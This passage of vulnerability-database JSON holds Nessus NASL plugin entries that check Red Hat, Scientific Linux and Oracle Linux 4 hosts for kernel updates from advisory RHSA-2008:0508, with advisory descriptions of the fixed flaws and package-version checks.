"scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "modified": "2008-07-02T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "p-cpe:/a:redhat:enterprise_linux:kernel-largesmp-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-smp-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-xenU", "p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-smp", "p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-hugemem", "p-cpe:/a:redhat:enterprise_linux:kernel-xenU-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-largesmp", "cpe:/o:redhat:enterprise_linux:4.6"], "id": "REDHAT-RHSA-2008-0508.NASL", "href": "https://www.tenable.com/plugins/nessus/33376", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0508. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(33376);\n script_version(\"1.27\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n script_bugtraq_id(29942);\n script_xref(name:\"RHSA\", value:\"2008:0508\");\n\n script_name(english:\"RHEL 4 : kernel (RHSA-2008:0508)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix several security issues and a bug are\nnow available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Alexey Dobriyan discovered a race condition in the Linux kernel\nprocess-tracing system call, ptrace. A local unprivileged user could\nuse this flaw to cause a denial of service (kernel hang).\n(CVE-2008-2365, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* It was discovered that the Linux kernel handled string operations in\nthe opposite way to the GNU Compiler Collection (GCC). This could\nallow a local unprivileged user to cause memory corruption.\n(CVE-2008-1367, Low)\n\nAs well, these updated packages fix the following bug :\n\n* On systems with a large number of CPUs (more than 16), multiple\napplications calling the 'times()' system call may have caused a\nsystem hang.\n\nRed Hat Enterprise Linux 4 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-0598\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-1367\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2365\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-2729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0508\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(200, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/07/02\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2008:0508\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0508\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-devel-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", reference:\"kernel-doc-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-hugemem-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-hugemem-devel-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-smp-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-smp-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-smp-devel-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-smp-devel-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-xenU-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-xenU-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i686\", reference:\"kernel-xenU-devel-2.6.9-67.0.20.EL\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"kernel-xenU-devel-2.6.9-67.0.20.EL\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-devel / kernel-doc / kernel-hugemem / etc\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T13:43:57", "description": "These updated packages fix the following security issues :\n\n - A security flaw was found in the Linux kernel memory\n copy routines, when running on certain AMD64 systems. If\n an unsuccessful attempt to copy kernel memory from\n source to destination memory locations occurred, the\n copy routines did not zero the content at the\n destination memory location. This could allow a local\n unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n\n - Alexey Dobriyan discovered a race condition in the Linux\n kernel process-tracing system call, ptrace. A local\n unprivileged user could use this flaw to cause a denial\n of service (kernel hang). (CVE-2008-2365, Important)\n\n - Tavis Ormandy discovered a deficiency in the Linux\n kernel 32-bit and 64-bit emulation. This could allow a\n local unprivileged user to prepare and run a specially\n crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data.\n (CVE-2008-0598, Important)\n\n - It was discovered that the Linux kernel handled string\n operations in the opposite way to the GNU Compiler\n Collection (GCC). This could allow a local unprivileged\n user to cause memory corruption. (CVE-2008-1367, Low)\n\nAs well, these updated packages fix the following bug :\n\n - On systems with a large number of CPUs (more than 16),\n multiple applications calling the 'times()' system call\n may have caused a system hang.", "edition": 26, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : kernel on SL4.x i386/x86_64", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "modified": "2012-08-01T00:00:00", "cpe": ["x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20080625_KERNEL_ON_SL4_X.NASL", "href": "https://www.tenable.com/plugins/nessus/60429", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(60429);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n\n script_name(english:\"Scientific Linux Security Update : kernel on SL4.x i386/x86_64\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"These updated packages fix the following security issues :\n\n - A security flaw was found in the Linux kernel memory\n copy routines, when running on certain AMD64 systems. If\n an unsuccessful attempt to copy kernel memory from\n source to destination memory locations occurred, the\n copy routines did not zero the content at the\n destination memory location. This could allow a local\n unprivileged user to view potentially sensitive data.\n (CVE-2008-2729, Important)\n\n - Alexey Dobriyan discovered a race condition in the Linux\n kernel process-tracing system call, ptrace. A local\n unprivileged user could use this flaw to cause a denial\n of service (kernel hang). (CVE-2008-2365, Important)\n\n - Tavis Ormandy discovered a deficiency in the Linux\n kernel 32-bit and 64-bit emulation. This could allow a\n local unprivileged user to prepare and run a specially\n crafted binary, which would use this deficiency to leak\n uninitialized and potentially sensitive data.\n (CVE-2008-0598, Important)\n\n - It was discovered that the Linux kernel handled string\n operations in the opposite way to the GNU Compiler\n Collection (GCC). This could allow a local unprivileged\n user to cause memory corruption. (CVE-2008-1367, Low)\n\nAs well, these updated packages fix the following bug :\n\n - On systems with a large number of CPUs (more than 16),\n multiple applications calling the 'times()' system call\n may have caused a system hang.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind0806&L=scientific-linux-errata&T=0&P=2508\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b580320a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cwe_id(200, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL4\", reference:\"kernel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-doc-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"SL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-smp-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-smp-devel-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-xenU-2.6.9-67.0.20.EL\")) flag++;\nif (rpm_check(release:\"SL4\", reference:\"kernel-xenU-devel-2.6.9-67.0.20.EL\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-17T12:44:10", "description": "From Red Hat Security Advisory 2008:0508 :\n\nUpdated kernel packages that fix several security issues and a bug are\nnow available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Alexey Dobriyan discovered a race condition in the Linux kernel\nprocess-tracing system call, ptrace. A local unprivileged user could\nuse this flaw to cause a denial of service (kernel hang).\n(CVE-2008-2365, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* It was discovered that the Linux kernel handled string operations in\nthe opposite way to the GNU Compiler Collection (GCC). This could\nallow a local unprivileged user to cause memory corruption.\n(CVE-2008-1367, Low)\n\nAs well, these updated packages fix the following bug :\n\n* On systems with a large number of CPUs (more than 16), multiple\napplications calling the 'times()' system call may have caused a\nsystem hang.\n\nRed Hat Enterprise Linux 4 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.", "edition": 27, "published": "2013-07-12T00:00:00", "title": "Oracle Linux 4 : kernel (ELSA-2008-0508)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-0598", "CVE-2008-2365", "CVE-2008-2729", "CVE-2008-1367"], "modified": "2013-07-12T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:kernel-hugemem", "p-cpe:/a:oracle:linux:kernel-devel", "p-cpe:/a:oracle:linux:kernel-doc", "p-cpe:/a:oracle:linux:kernel-xenU-devel", "p-cpe:/a:oracle:linux:kernel-xenU", "p-cpe:/a:oracle:linux:kernel-smp-devel", "p-cpe:/a:oracle:linux:kernel-largesmp", "p-cpe:/a:oracle:linux:kernel-smp", "p-cpe:/a:oracle:linux:kernel-hugemem-devel", "cpe:/o:oracle:linux:4", "p-cpe:/a:oracle:linux:kernel", "p-cpe:/a:oracle:linux:kernel-largesmp-devel"], "id": "ORACLELINUX_ELSA-2008-0508.NASL", "href": "https://www.tenable.com/plugins/nessus/67703", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0508 and \n# Oracle Linux Security Advisory ELSA-2008-0508 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67703);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\");\n script_bugtraq_id(29942);\n script_xref(name:\"RHSA\", value:\"2008:0508\");\n\n script_name(english:\"Oracle Linux 4 : kernel (ELSA-2008-0508)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0508 :\n\nUpdated kernel packages that fix several security issues and a bug are\nnow available for Red Hat Enterprise Linux 4.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated packages fix the following security issues :\n\n* A security flaw was found in the Linux kernel memory copy routines,\nwhen running on certain AMD64 systems. If an unsuccessful attempt to\ncopy kernel memory from source to destination memory locations\noccurred, the copy routines did not zero the content at the\ndestination memory location. This could allow a local unprivileged\nuser to view potentially sensitive data. (CVE-2008-2729, Important)\n\n* Alexey Dobriyan discovered a race condition in the Linux kernel\nprocess-tracing system call, ptrace. A local unprivileged user could\nuse this flaw to cause a denial of service (kernel hang).\n(CVE-2008-2365, Important)\n\n* Tavis Ormandy discovered a deficiency in the Linux kernel 32-bit and\n64-bit emulation. This could allow a local unprivileged user to\nprepare and run a specially crafted binary, which would use this\ndeficiency to leak uninitialized and potentially sensitive data.\n(CVE-2008-0598, Important)\n\n* It was discovered that the Linux kernel handled string operations in\nthe opposite way to the GNU Compiler Collection (GCC). This could\nallow a local unprivileged user to cause memory corruption.\n(CVE-2008-1367, Low)\n\nAs well, these updated packages fix the following bug :\n\n* On systems with a large number of CPUs (more than 16), multiple\napplications calling the 'times()' system call may have caused a\nsystem hang.\n\nRed Hat Enterprise Linux 4 users are advised to upgrade to these\nupdated packages, which contain backported patches to resolve these\nissues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-June/000657.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(200, 362, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-hugemem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-hugemem-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-largesmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-largesmp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-smp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-smp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xenU\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xenU-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/03/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^4([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 4\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2008-0598\", \"CVE-2008-1367\", \"CVE-2008-2365\", \"CVE-2008-2729\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2008-0508\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-2.6.9\") && rpm_check(release:\"EL4\", reference:\"kernel-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-devel-2.6.9\") && rpm_check(release:\"EL4\", reference:\"kernel-devel-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-doc-2.6.9\") && rpm_check(release:\"EL4\", reference:\"kernel-doc-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-hugemem-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-hugemem-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-hugemem-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"i386\", reference:\"kernel-hugemem-devel-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"ia64\", reference:\"kernel-largesmp-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"x86_64\", reference:\"kernel-largesmp-2.6.9-67.0.20.0.1.EL\")) flag++;\nif (rpm_exists(release:\"EL4\", rpm:\"kernel-largesmp-devel-2.6.9\") && rpm_check(release:\"EL4\", cpu:\"ia64\", 